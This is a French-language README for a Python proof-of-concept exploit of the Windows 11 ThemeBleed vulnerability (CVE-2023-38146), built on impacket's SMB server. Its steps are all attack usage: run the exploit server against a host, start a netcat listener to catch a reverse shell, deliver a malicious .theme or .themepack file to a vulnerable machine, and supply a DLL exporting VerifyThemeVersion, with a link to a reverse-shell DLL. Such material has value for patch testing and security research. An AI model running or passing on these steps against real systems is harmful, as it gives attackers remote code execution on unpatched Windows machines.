
PoC pour la vulnérabilité ThemeBleed de Windows 11 (CVE-2023-38146), écrit en Python à l'aide d'impacket. https://jnns.de/posts/cve-2023-38146-poc/
Fortement inspiré par https://github.com/gabe-k/themebleed qui ne fonctionne que sous Windows (c'est la raison pour laquelle j'ai décidé d'écrire celui-ci).
Utilisation de code modifié provenant de impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
Trucs utiles : https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
Article de blog : https://jnns.de/posts/cve-2023-38146-poc/
Installez les dépendances et lancez l'application :
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
Utilisez "evil_theme.theme" ou "evil_theme.themepack" sur une machine vulnérable.
Profitez !
Placez une DLL avec une fonction exportée "VerifyThemeVersion" dans le "./td/" dossier nommé "Aero.msstyles_vrf_evil.dll". Vous devriez pouvoir trouver un exemple de DLL en utilisant Google ou utiliser mon exemple https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711